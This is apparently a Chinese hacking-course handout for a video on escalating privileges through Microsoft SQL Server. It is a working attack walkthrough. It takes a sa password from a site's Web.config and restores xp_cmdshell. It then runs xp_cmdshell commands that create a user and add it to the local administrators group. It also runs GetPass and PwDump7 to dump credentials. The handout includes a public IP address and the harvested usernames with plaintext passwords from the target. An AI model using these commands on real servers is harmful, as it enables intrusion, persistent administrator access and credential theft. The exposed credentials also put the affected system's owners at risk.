╭──────────────────────────╮
  猫客工作室--真诚、高效、创新，敢想敢做努力做到最好！ 
╰──────────────────────────╯

>讲师名称：剑眉大侠（QQ767501681）

>动画名称：利用Mssql提权



两个条件

第一：服务器装了mssql软件

第二：开启了mssql服务（1433端口）



sqlservr.exe                  1216 MSSQL$RAVN                                  
sqlservr.exe                  1344 MSSQL$UDDI                                  
sqlservr.exe                  1448 MSSQLSERVER  

127.0.0.1 : 1433 ................................. Close

Web.Config

conn.asp

config.asp

<add key="connectionString"  value="server=.;uid=sa;pwd=369;database=nongfa" />

sa权限
SrvRoleMember : sa


如果执行语句增加不上用户，说明这个xp_cmdshell组建删除，就执行语句开一下：
Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')

数据库中已存在名为 'xp_cmdshell' 的对象。




SQL增加用户：exec master.dbo.xp_cmdshell 'net user jianmei daxia.asd /add';--
SQL提升权限：exec master.dbo.xp_cmdshell 'net localgroup administrators jianmei /add';--


admin$ 
IIS_use 
jianmei 
temp 
xiedai 
命令成功完成。 

221.215.102.181


C:\windows/temp\GetPass_cmd.exe



exec master.dbo.xp_cmdshell 'D:\wwwroot\nongfa\PwDump7.exe >1.txt';--



Code by Vsbat/bbs.kanxue.com More：http://bbs.pediy.com/showthread.php?t=156643 
Release by 闪电小子/pkav.net More：http://t.qq.com/dis9_tysan 
  
UserName: jianmei 
LogonDomain: NFJ-C 
password: daxia.asd 
  
UserName: xiedai 
LogonDomain: NFJ-C 
password: 1120 
  
UserName: temp 
LogonDomain: NFJ-C 
password: 123456